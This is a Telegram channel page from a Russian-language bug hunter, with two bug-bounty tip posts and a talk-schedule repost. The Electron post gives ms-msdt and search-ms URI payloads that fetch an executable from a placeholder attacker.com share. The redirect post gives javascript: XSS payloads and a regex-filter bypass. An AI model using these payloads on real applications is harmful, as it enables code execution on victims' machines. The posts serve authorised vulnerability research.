Записки Зёмы
Open in Telegram
Канал одного клоуна-багхантера-пентестера. 17 y.o. third-year student of the TCMC (Information Security). Some not regular notes from and for myself. h1: zelenskyy && 0xlivebeef Quality content is not included. contact: t.me/damnwaree
Show more306
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
306
Repost from Багхантер
😭😒🫕 Кузькина мать
30 октября 1961 года серьезные люди собрались на Новой Земле с одной целью - взорвать термоядерную авиационную бомбу "Кузькину мать" или по-другому "Царь-бомбу" (путем сброса её с самолета) на ядерном полигоне «Сухой Нос». Итоговая мощность взрыва составила примерно 58,6 мегатонн в тротилловом эквиваленте, что соответствует дефекту масс примерно 2.65 кг. В радиусе 35 километров от точки взрыва все здания были полностью уничтожены, ударная волна 3 раза обогнула Землю, а сама ядерная вспышка была видна на расстоянии более 1000 км.
14 октября 2023 года в 18:00 серьезные люди (сотни а может быть даже тысячи багхантеров и 10 докладчиков) соберутся онлайн на трансляции в канале "Багхантер" с одной целью - послушать доклады экспертов мирового уровня, известных багхантеров, специалистов по информационной безопасности с большим опытом. "Мы вам еще покажем кузькину мать!"
Примерное расписание:
завтра, в
18:10 - 18:30 - «Техобслуживание и ремонт системы питания дизельного двигателя»
18:30 - 18:50 - «Вкатываемся в Web3 на примере TON»
18:50 - 19:10 - «Вкатываемся в Web3»
19:10 - 19:30 - «Как сломать банкомат... через интернет!»
19:30 - 20:10 - «Логические баги из реальной жизни»
20:10 - 20:30 - «Generate werkzeug pins»
20:30 - 20:50 - «развитие ББ ВК»
20:50 - 21:10 - «нашёл SELF XSS не сдавайся»
21:10 - 21:30 - «Zerocode security v0.7 - Mobile builders»
21:30 - 21:50 - «Наступательные инструменты разработчика»
🐹 Багхантер
306
Недавно у Багхантер (кто не подписан, объяснитесь, как так вышло?) проходил конкурс, в котором нужно было написать про свою самую лучшую находку.
Я принял участие и занял почётное 3 место.
Получил носочки, значки, промо на +3к к репорту у ВК и стикеры.
Спасибо огромное Юре за конкурс, а также вендорам за предоставленные призы <3
Статья про уязвимость будет уже скоро на канале.
306
Bug Bounty Tips #2
Сегодня затронем приложения на Electron. А конкретнее доведение XSS до RCE (ну или почти).
Что может понадобиться для упрощения работы:
Сканер electronegativity. Он нужен для сканирования Electron приложений на различные мисконфигурации;
Сканер nodejsscan. Этот инструмент умеет в сканирование модулей nodejs, которые наверняка встроены в исследуемый продукт.
Первым делом нужно найти XSS в исследуемом сервисе. Довольно часто её причиной становится Markdown (на своей практике встречал уже несколько раз). Найти больше информации по XSS в Markdown можно тут.
Если XSS на нашем сайте не была найдена, нужно идти в код приложение и смотреть как приложения открывает ссылки.
Кейс 1 -
Внешние ссылки открываются во внешнем браузере.
Решение - Искать мисконфигурации открытия. Например, проверки на то, что ссылка содержит https://example.com/, а не начинается на это. Ещё можно попытаться кликнуть средней кнопкой мыши.
Кейс 2 -
Внешние ссылки открываются в самом приложении.
Если встретили такое поведение - вам упростили работу.
Итак. Мы смогли найти XSS/возможность открыть внешние ссылки. Что дальше? - встраивать полезные нагрузки. Если electron приложение имеет мисконфигурацию в области работы с nodejs - вы сможете выполнить код. Если нет - смотрите на версию Electron. Вполне возможно, что попадётся версия, уязвимая к различным обходам nodeIntegration.
Если выполнить код не удалось, то можно попытаться выполнить удалённый код/повысить импакт XSS при помощи различных URI схем.
Примеры того, что можно использовать:
ms-msdt:-id PCWDiagnostic /moreoptions false /skip true /param IT_BrowseForFile="\\attacker.com\smb_share\malicious_executable.exe" /param IT_SelectProgram="NotListed" /param IT_AutoTroubleshoot="ts_AUTO search-ms:query=malicious_executable.exe&crumb=location:%5C%5Cattacker.com%5Csmb_share%5Ctools&displayname=Important%20updateЭти "ссылки" необходимо открыть каким-либо образом. В случае с markdown их можно встроить в ссылки [Some Text](Payload), а затем открыть при помощи СКМ. Если вы нашли XSS/смогли открыть произвольную страницу - откройте при помощи window.open(Payload) На этих строчках подхожу к концу и желаю всем удачи в поисках уязвимостей. @zema_notes p.s. перечитал пост и понял. что кому-то может он показаться непонятным, поэтому если есть вопросы - пишите в комменты, постараюсь ответить.
306
Давно тут не появлялся.
Разбавлю пустоту небольшими Tips для Bug Bounty.
Часть будет многим известна, часть, но возможно, для кого-то станет чем-то новеньким. Всё же мой канал не только для профессионалов в сфере ИБ.
Что же, BB Tips #1.
XSS в Redirect.
Представим ситуацию - вы нашли кнопку редиректа, значение которой подставляется со стороны пользователя. Open Redirect принимается мало где, именно поэтому нужно попытаться докрутить до XSS, чтобы был импакт. Как это сделать рассмотрим ниже.
Вариант 1 (самый топорный, но часто срабатывает).
Payload -
javascript:alert(document.domain)Вставляем, кликаем и... Ничего не происходит. Нас просто отправляет на страницу about#blocked (или about#blank). Решение - кликать средней кнопкой мыши по ссылке. Hint: ещё это срабатывает с Markdown. Payload -
[a](javascript:alert(document.domain))Вариант 2. Если разработчики фильтруют строку, чтобы она не начиналась с javascript:, при помощи регулярного выражения следующего вида
^(?!javascript:).+можно подставить пробел в начало нашей нагрузки. Если ссылка подставляется из параметров, поставьте %20, чтобы пейлоад приобрёл следующий вид:
%20javascript:alert()Вставляем, кликаем СКМ, наслаждаемся XSS.
